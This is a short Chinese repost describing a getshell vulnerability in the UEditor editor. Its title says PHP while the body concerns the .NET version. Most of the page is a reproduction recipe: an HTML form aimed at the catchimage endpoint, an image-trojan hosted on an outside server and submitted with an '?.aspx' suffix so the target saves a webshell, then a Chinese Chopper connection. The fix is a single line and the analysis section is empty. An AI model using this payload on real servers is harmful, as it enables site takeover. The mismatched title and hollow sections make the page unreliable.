ue编辑器php漏洞:ueditor getshell
生活随笔
收集整理的這篇文章主要介紹了
ue编辑器php漏洞:ueditor getshell
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
ueditor getshell漏洞概述
8月21日,網(wǎng)上爆出ueditor .net版本getshell漏洞,由于只校驗ContentType而沒校驗文件后綴導(dǎo)致getshell。
ueditor getshell漏洞重現(xiàn)
Payload:
<form action=”http://www.xxx.com/controller.ashx?action=catchimage” enctype=”application/x-www-form-urlencoded” method=”POST”>
<p>shell addr:<input type=”text” name=”source[]” /></p >
<input type=”submit” value=”Submit” />
</form>
圖片馬x.jpg放在自己服務(wù)器上
提交http://www.domain.top/x.jpg?.aspx
菜刀連接:
ueditor getshell修復(fù)方案
增加文件擴展名校驗(白名單)
ueditor getshell漏洞分析
總結(jié)
以上是生活随笔為你收集整理的ue编辑器php漏洞:ueditor getshell的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: cs439辅导 进程和线程以及死锁
- 下一篇: 动态规划算法php,php算法学习之动态